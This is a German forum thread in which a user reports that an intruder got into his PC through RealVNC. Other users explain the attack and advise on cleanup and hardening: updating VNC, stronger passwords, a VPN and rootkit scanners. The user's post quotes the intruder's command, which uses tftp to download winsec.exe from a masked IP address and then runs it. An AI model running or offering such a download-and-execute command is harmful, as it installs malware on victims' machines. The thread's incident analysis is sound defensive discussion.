12
Hacker war über RealVNC auf meine PC
Hallo!
Ich hab auf meinem Windows 2000 Rechner RealVNC laufen, damit ich von der Arbeit aus auf diesen zugreifen kann.
Heute ist mir aufgefallen, dass in der Taskleiste ungefähr 10 mal cmd geöffnet war, obwohl ich diese nicht geöffnet hatte.
Einmal mit Tippfehler. Nachdem ich die CMD-Fenster geschlossen hatte, klickte mein Mauszeiger automatisch auf "ausführen" und gab den selben Code zum 11. mal ein.
Folgendes wurde unter "ausführen" eingegeben:
cmd /c tftp -i xx.xxx.xx.xxx GET winsec.exe &start winsec.exe &exit
(anstelle der x stand eine mir unbekannte IP-Adresse).
Zone Alarm fragte, ob es tftp zulassen soll. Diese Frage konnte der Hacker nicht beantworten, weil man via VNC keine Änderungen an Zone Alarm vornehmen kann.
(Hab ich selber getestet, weil ich mich gefragt hatte, warum der Hacker nicht einfach auf "zulassen" geklickt hat).
Die Verbindung von VNC hab ich mit einem 6 stelligen Passwort geschützt. Dies muss man am Anfang eingeben, damit man sich mit meinem PC verbinden kann. Trotzdem konnte sich der Hacker mit meinem PC verbinden.
Meine Fragen:
1. Was bewirkt der Code bzw. was wollte der Hacker erreichen?
2. Könnt irgendwas Schädliches auf meinem PC jetzt sein?
3. Wie kam der Hacker innerhalb eines Vormittags auf meine IP+Passwort?
4. Was kann ich tun, damit dies nicht nochmal passiert?
Vielen Dank
Ich hab auf meinem Windows 2000 Rechner RealVNC laufen, damit ich von der Arbeit aus auf diesen zugreifen kann.
Heute ist mir aufgefallen, dass in der Taskleiste ungefähr 10 mal cmd geöffnet war, obwohl ich diese nicht geöffnet hatte.
Einmal mit Tippfehler. Nachdem ich die CMD-Fenster geschlossen hatte, klickte mein Mauszeiger automatisch auf "ausführen" und gab den selben Code zum 11. mal ein.
Folgendes wurde unter "ausführen" eingegeben:
cmd /c tftp -i xx.xxx.xx.xxx GET winsec.exe &start winsec.exe &exit
(anstelle der x stand eine mir unbekannte IP-Adresse).
Zone Alarm fragte, ob es tftp zulassen soll. Diese Frage konnte der Hacker nicht beantworten, weil man via VNC keine Änderungen an Zone Alarm vornehmen kann.
(Hab ich selber getestet, weil ich mich gefragt hatte, warum der Hacker nicht einfach auf "zulassen" geklickt hat).
Die Verbindung von VNC hab ich mit einem 6 stelligen Passwort geschützt. Dies muss man am Anfang eingeben, damit man sich mit meinem PC verbinden kann. Trotzdem konnte sich der Hacker mit meinem PC verbinden.
Meine Fragen:
1. Was bewirkt der Code bzw. was wollte der Hacker erreichen?
2. Könnt irgendwas Schädliches auf meinem PC jetzt sein?
3. Wie kam der Hacker innerhalb eines Vormittags auf meine IP+Passwort?
4. Was kann ich tun, damit dies nicht nochmal passiert?
Vielen Dank
Share on Facebook
Share on Twitter
Share on Reddit
Share on LinkedinPlease also mark the comments that contributed to the solution of the article
Content-Key: 42137
Url: https://administrator.de/contentid/42137
Printed on: April 25, 2024 at 14:04 o'clock
12 Comments
Latest comment
1. Was bewirkt der Code bzw. was wollte der
Hacker erreichen?
Hacker erreichen?
Dieser wollte wahrscheinlich eine Datei auf deinen PC laden tftp = Trivial File Transer Protocol
2. Könnt irgendwas Schädliches auf
meinem PC jetzt sein?
meinem PC jetzt sein?
Ist immer möglich. Virenscanner aktualisieren und evtl. ein Rootkit Scanner installieren und durchlaufen lassen.
3. Wie kam der Hacker innerhalb eines
Vormittags auf meine IP+Passwort?
Vormittags auf meine IP+Passwort?
Wenn du von deinem Geschäft aus diese Verbindung aufbaust, kann er sehr leicht einen Sniffer einbauen. Sonst gibt es Trojaner, Keylogger oder viele andere Möglichkeiten
4. Was kann ich tun, damit dies nicht
nochmal passiert?
nochmal passiert?
Evtl. VPN Tunnel einrichten, oder z.B. www.logmein.com hier wird die verbindung auch verschlüsselt
Weitere Ideen?
Grüsse Shaby
Mir ist noch eingefallen:
Du hast wahrscheinlich die IP deines Angreifers - Hier im Forum hat es noch ein Turitorial betreffend Scrippt Kiddies sicher interessant für dich.
Ein guter Hacker kann das auch nicht gewesen sein, denn die hinterlassen nicht so offensichtliche Spuren
Du hast wahrscheinlich die IP deines Angreifers - Hier im Forum hat es noch ein Turitorial betreffend Scrippt Kiddies sicher interessant für dich.
Ein guter Hacker kann das auch nicht gewesen sein, denn die hinterlassen nicht so offensichtliche Spuren
Hi,
welche Version von VNC hast Du denn installiert, soweit ich weiss gab es eine Version,
die einen Fehler hatte, der es erlaubte, sich ohne Passwort anzumelden (war glaub Version 4.0 von realVNC).
Also zuerst mal auf eine aktuelle VNC Version updaten.
Ein 6 stelliges Passwort ist nicht besonders sicher und mittels eines Passwort Testers relativ schnell gehackt, ich würde für einen Zugang, der direkt über das Internet erreichbar ist mindestens ein 8 stelliges besser noch längeres kryptisches Passwort gemischt aus Zahlen,
Buschstaben und Sonderzeichen verwenden.
Ich würde VNC erstmal komplett ausschalten und den PC einer gründlichen Untersuchung
mit verschiedenen Spyware-, Adware- und Virenscannern unterziehen.
Die in der Kommandozeile erwähnte winsec.exe könnte einen Bot/Wurm/Trojaner enthalten,
aber er hat es ja offensichtliche nicht geschafft, diese auszuführen.
Du könntest mir mal die IP per PM schicken, dann kann man mal schauen, woher der Angriff
kam.
Gruß
cykes
welche Version von VNC hast Du denn installiert, soweit ich weiss gab es eine Version,
die einen Fehler hatte, der es erlaubte, sich ohne Passwort anzumelden (war glaub Version 4.0 von realVNC).
Also zuerst mal auf eine aktuelle VNC Version updaten.
Ein 6 stelliges Passwort ist nicht besonders sicher und mittels eines Passwort Testers relativ schnell gehackt, ich würde für einen Zugang, der direkt über das Internet erreichbar ist mindestens ein 8 stelliges besser noch längeres kryptisches Passwort gemischt aus Zahlen,
Buschstaben und Sonderzeichen verwenden.
Ich würde VNC erstmal komplett ausschalten und den PC einer gründlichen Untersuchung
mit verschiedenen Spyware-, Adware- und Virenscannern unterziehen.
Die in der Kommandozeile erwähnte winsec.exe könnte einen Bot/Wurm/Trojaner enthalten,
aber er hat es ja offensichtliche nicht geschafft, diese auszuführen.
Du könntest mir mal die IP per PM schicken, dann kann man mal schauen, woher der Angriff
kam.
Gruß
cykes
Vielen Dank für die schnelle Antwort.
> 1. Was bewirkt der Code bzw. was wollte
der
> Hacker erreichen?
Dieser wollte wahrscheinlich eine Datei auf
deinen PC laden tftp = Trivial File Transer
Protocol
Was wollte der Hacker mit winsec.exe?
Mich würde interessieren, was diese exe für eine Funktion hat.
Außerdem warum benutzt er &start und &exit? Dies kommt in der Sytax von tftp doch gar nicht vor.
> 2. Könnt irgendwas
Schädliches auf
> meinem PC jetzt sein?
Ist immer möglich. Virenscanner
aktualisieren und evtl. ein Rootkit Scanner
installieren und durchlaufen lassen.
Mit Rootkit Scannern kenn ich mich leider (noch) nicht aus, gibt es welche, die man empfehlen könnte. Am besten Freeware. Danke!
Damit werd ich mich mal auseinander setzen.
> 1. Was bewirkt der Code bzw. was wollte
der
> Hacker erreichen?
Dieser wollte wahrscheinlich eine Datei auf
deinen PC laden tftp = Trivial File Transer
Protocol
Was wollte der Hacker mit winsec.exe?
Mich würde interessieren, was diese exe für eine Funktion hat.
Außerdem warum benutzt er &start und &exit? Dies kommt in der Sytax von tftp doch gar nicht vor.
> 2. Könnt irgendwas
Schädliches auf
> meinem PC jetzt sein?
Ist immer möglich. Virenscanner
aktualisieren und evtl. ein Rootkit Scanner
installieren und durchlaufen lassen.
Mit Rootkit Scannern kenn ich mich leider (noch) nicht aus, gibt es welche, die man empfehlen könnte. Am besten Freeware. Danke!
> 4. Was kann ich tun, damit dies nicht
> nochmal passiert?
Evtl. VPN Tunnel einrichten, oder z.B.
www.logmein.com hier wird die verbindung auch
verschlüsselt
Weitere Ideen?
> nochmal passiert?
Evtl. VPN Tunnel einrichten, oder z.B.
www.logmein.com hier wird die verbindung auch
verschlüsselt
Weitere Ideen?
Damit werd ich mich mal auseinander setzen.
welche Version von VNC hast Du denn
installiert, soweit ich weiss gab es eine
Version,
die einen Fehler hatte, der es erlaubte,
sich ohne Passwort anzumelden (war glaub
Version 4.0 von realVNC).
installiert, soweit ich weiss gab es eine
Version,
die einen Fehler hatte, der es erlaubte,
sich ohne Passwort anzumelden (war glaub
Version 4.0 von realVNC).
Ich hab VNC 4.1 von chip.de
Also zuerst mal auf eine aktuelle VNC
Version updaten.
Version updaten.
Ich denke, das ist die aktuellste Version.
Ein 6 stelliges Passwort ist nicht besonders
sicher und mittels eines Passwort Testers
relativ schnell gehackt, ich würde
für einen Zugang, der direkt über
das Internet erreichbar ist mindestens ein 8
stelliges besser noch längeres
kryptisches Passwort gemischt aus Zahlen,
Buschstaben und Sonderzeichen verwenden.
sicher und mittels eines Passwort Testers
relativ schnell gehackt, ich würde
für einen Zugang, der direkt über
das Internet erreichbar ist mindestens ein 8
stelliges besser noch längeres
kryptisches Passwort gemischt aus Zahlen,
Buschstaben und Sonderzeichen verwenden.
Ich kenn mich ein bisschen mit Passwortsicherheit aus, dass man ein 6 stelliges aber so schnell hat, war mir nicht bekannt.
Ich würde VNC erstmal komplett
ausschalten und den PC einer gründlichen
Untersuchung
mit verschiedenen Spyware-, Adware- und
Virenscannern unterziehen.
ausschalten und den PC einer gründlichen
Untersuchung
mit verschiedenen Spyware-, Adware- und
Virenscannern unterziehen.
VNC ist jetzt natürlich aus, hab mir eine neue IP zuweisen lassen und werd in den nächsten Tagen den PC checken. Soll ich auch einen Rootkit Scanner durchlaufen lassen? Wenn ja, welcher ist empfehlenswert?
Die in der Kommandozeile erwähnte
winsec.exe könnte einen
Bot/Wurm/Trojaner enthalten,
aber er hat es ja offensichtliche nicht
geschafft, diese auszuführen.
winsec.exe könnte einen
Bot/Wurm/Trojaner enthalten,
aber er hat es ja offensichtliche nicht
geschafft, diese auszuführen.
Nein das hat er so wie es für mich aussieht nicht geschafft.
Hallo,
Es kommt auch ein wenig auf die Qualität des Passworts an!
a) Kein Wort, das in irgendeinem Wörterbuch der Erde vorkommen kann ("MickyMaus" hat sogar 9 Buchstaben, aber den Rechner könnte auch ich "hacken").
b) Deshalb am besten sinnlose Kombinationen (siehe mein Vorredner: Zahlen, Buchstaben, Sonderzeichen)
Zur Not erstell Dir ein Eselslücken-Passwort:
--> Mein Computer, den ich sehr mag, wurde schon achtmal gehackt --> Anfangsbuchstaben: MC,ddism,ws8g
Super Passwort, nicht?
http://www.sophos.de/products/free-tools/sophos-anti-rootkit.html
http://www.pctipp.ch/downloads/dl/34539.asp?rssdloads
Gruß,
Tim
Ich kenn mich ein bisschen mit
Passwortsicherheit aus, dass man ein 6
stelliges aber so schnell hat, war mir nicht
bekannt.
Passwortsicherheit aus, dass man ein 6
stelliges aber so schnell hat, war mir nicht
bekannt.
Es kommt auch ein wenig auf die Qualität des Passworts an!
a) Kein Wort, das in irgendeinem Wörterbuch der Erde vorkommen kann ("MickyMaus" hat sogar 9 Buchstaben, aber den Rechner könnte auch ich "hacken").
b) Deshalb am besten sinnlose Kombinationen (siehe mein Vorredner: Zahlen, Buchstaben, Sonderzeichen)
Zur Not erstell Dir ein Eselslücken-Passwort:
--> Mein Computer, den ich sehr mag, wurde schon achtmal gehackt --> Anfangsbuchstaben: MC,ddism,ws8g
Super Passwort, nicht?
VNC ist jetzt natürlich aus, hab mir
eine neue IP zuweisen lassen und werd in den
nächsten Tagen den PC checken. Soll ich
auch einen Rootkit Scanner durchlaufen
lassen? Wenn ja, welcher ist empfehlenswert?
eine neue IP zuweisen lassen und werd in den
nächsten Tagen den PC checken. Soll ich
auch einen Rootkit Scanner durchlaufen
lassen? Wenn ja, welcher ist empfehlenswert?
http://www.sophos.de/products/free-tools/sophos-anti-rootkit.html
http://www.pctipp.ch/downloads/dl/34539.asp?rssdloads
Gruß,
Tim
Zur Not erstell Dir ein
Eselslücken-Passwort:
--> Mein Computer, den ich sehr mag,
wurde schon achtmal gehackt -->
Anfangsbuchstaben: MC,ddism,ws8g
Super Passwort, nicht?
Eselslücken-Passwort:
--> Mein Computer, den ich sehr mag,
wurde schon achtmal gehackt -->
Anfangsbuchstaben: MC,ddism,ws8g
Super Passwort, nicht?
So ein Passwort werd ich mir jetzt natürlich zulegen!
Soll ich
> auch einen Rootkit Scanner durchlaufen
> lassen? Wenn ja, welcher ist
empfehlenswert?
http://www.sophos.de/products/free-tools/sophos-anti-rootkit.html
http://www.pctipp.ch/downloads/dl/34539.asp?rssdloads
> auch einen Rootkit Scanner durchlaufen
> lassen? Wenn ja, welcher ist
empfehlenswert?
http://www.sophos.de/products/free-tools/sophos-anti-rootkit.html
http://www.pctipp.ch/downloads/dl/34539.asp?rssdloads
Danke Tim!
Hier noch einer
Wie schon erwähnt wurde, wollte der Hacker evt. einen Virus übertragen.
Doch warum nimmt er dazu die winsec.exe
Was hat die exe für eine Funktion.
Außerdem warum benutzt er &start und &exit? Dies kommt in der Sytax von tftp doch gar nicht vor.
Wollte der Hacker meinen PC als eine Art Abstellplatz für Daten verwenden oder hatte er etwas anderes vor?
Danke für Tipps!
Doch warum nimmt er dazu die winsec.exe
Was hat die exe für eine Funktion.
Außerdem warum benutzt er &start und &exit? Dies kommt in der Sytax von tftp doch gar nicht vor.
Wollte der Hacker meinen PC als eine Art Abstellplatz für Daten verwenden oder hatte er etwas anderes vor?
Danke für Tipps!
Hi,
da gibt es ganz verschiedene Möglichkeiten, scheinbar war er erst am Anfang seiner "Arbeit"
und hat erstmal nach Möglichkeiten gesucht, irgendwelche "Tools" zu installieren.
Sieht auf jeden Fall sehr nach nem ScriptKiddie aus.
Würde mir da nicht zu viele Sorgen machen, wenn Du den Rechner überprüft hast und er OK ist,
dann den VNC besser absichern und obvenstehende Tips befolgen, dann passt das schon
wieder.
Gruß
cykes
da gibt es ganz verschiedene Möglichkeiten, scheinbar war er erst am Anfang seiner "Arbeit"
und hat erstmal nach Möglichkeiten gesucht, irgendwelche "Tools" zu installieren.
Sieht auf jeden Fall sehr nach nem ScriptKiddie aus.
Würde mir da nicht zu viele Sorgen machen, wenn Du den Rechner überprüft hast und er OK ist,
dann den VNC besser absichern und obvenstehende Tips befolgen, dann passt das schon
wieder.
Gruß
cykes
Hallo,
Winsec.exe ist ein Schadprogramm und kein Windows-Tool!
http://www.securitystronghold.com/gates/spyware-adware-solutions/Window ...
http://www.bleepingcomputer.com/startups/winsecexe-6510.html
& ist in der CMD-Shell ein Befehlsseparator. Das stellt sicher, dass alle Ausdrücke, vor denen & steht als eigener Befehl interpretiert werden und nicht als Parameter des vorhergehenden.
Er hatte vor, das Programm winsec.exe auf Deinen Rechner zu bringen und es zu starten. Das Programm hätte sich dann in die Registry eingetragen, um dauerhaft immer automatisch mitgestartet zu werden. Wie es aussieht, ist winsec.exe eine Variante der "Cool Web Search"-Malware. Das hätte auf jeden Fall dazu geführt, dass Du mit Popups usw. belästigt worden wärst; dein Browser wäre auf eine andere Startseite umgeleitet worden und evtl. wäre auch Deine hosts-Datei bearbeitet worden. Alles in allem sehe ich das eher als Nervigkeit, nicht aber als unbedingte Gefahr (soviel zur ersten Beruhigung).
Eventuell wäre es gut, wenn Du mal Adaware laufen lässt!
Gruß,
Tim
Wie schon erwähnt wurde, wollte der
Hacker evt. einen Virus übertragen.
Doch warum nimmt er dazu die winsec.exe
Hacker evt. einen Virus übertragen.
Doch warum nimmt er dazu die winsec.exe
Winsec.exe ist ein Schadprogramm und kein Windows-Tool!
http://www.securitystronghold.com/gates/spyware-adware-solutions/Window ...
http://www.bleepingcomputer.com/startups/winsecexe-6510.html
Was hat die exe für eine Funktion.
Außerdem warum benutzt er &start
und &exit? Dies kommt in der Sytax von
tftp doch gar nicht vor.
Außerdem warum benutzt er &start
und &exit? Dies kommt in der Sytax von
tftp doch gar nicht vor.
& ist in der CMD-Shell ein Befehlsseparator. Das stellt sicher, dass alle Ausdrücke, vor denen & steht als eigener Befehl interpretiert werden und nicht als Parameter des vorhergehenden.
Wollte der Hacker meinen PC als eine Art
Abstellplatz für Daten verwenden oder
hatte er etwas anderes vor?
Abstellplatz für Daten verwenden oder
hatte er etwas anderes vor?
Er hatte vor, das Programm winsec.exe auf Deinen Rechner zu bringen und es zu starten. Das Programm hätte sich dann in die Registry eingetragen, um dauerhaft immer automatisch mitgestartet zu werden. Wie es aussieht, ist winsec.exe eine Variante der "Cool Web Search"-Malware. Das hätte auf jeden Fall dazu geführt, dass Du mit Popups usw. belästigt worden wärst; dein Browser wäre auf eine andere Startseite umgeleitet worden und evtl. wäre auch Deine hosts-Datei bearbeitet worden. Alles in allem sehe ich das eher als Nervigkeit, nicht aber als unbedingte Gefahr (soviel zur ersten Beruhigung).
Eventuell wäre es gut, wenn Du mal Adaware laufen lässt!
Gruß,
Tim
Winsec.exe ist ein Schadprogramm und kein
Windows-Tool!
http://www.securitystronghold.com/gates/spyware-adware-solutions/Window ...
http://www.bleepingcomputer.com/startups/winsecexe-6510.html
Windows-Tool!
http://www.securitystronghold.com/gates/spyware-adware-solutions/Window ...
http://www.bleepingcomputer.com/startups/winsecexe-6510.html
Sprich die exe ist bei windows gar nicht dabei, wenn Sie jetzt also drauf ist, ist sie verdächtig?
> Außerdem warum benutzt er
&start
> und &exit? Dies kommt in der Sytax
von
> tftp doch gar nicht vor.
& ist in der CMD-Shell ein
Befehlsseparator. Das stellt sicher, dass
alle Ausdrücke, vor denen & steht
als eigener Befehl interpretiert werden und
nicht als Parameter des vorhergehenden.
&start
> und &exit? Dies kommt in der Sytax
von
> tftp doch gar nicht vor.
& ist in der CMD-Shell ein
Befehlsseparator. Das stellt sicher, dass
alle Ausdrücke, vor denen & steht
als eigener Befehl interpretiert werden und
nicht als Parameter des vorhergehenden.
&start bedeutet also, dass das Programm gestartet wird?
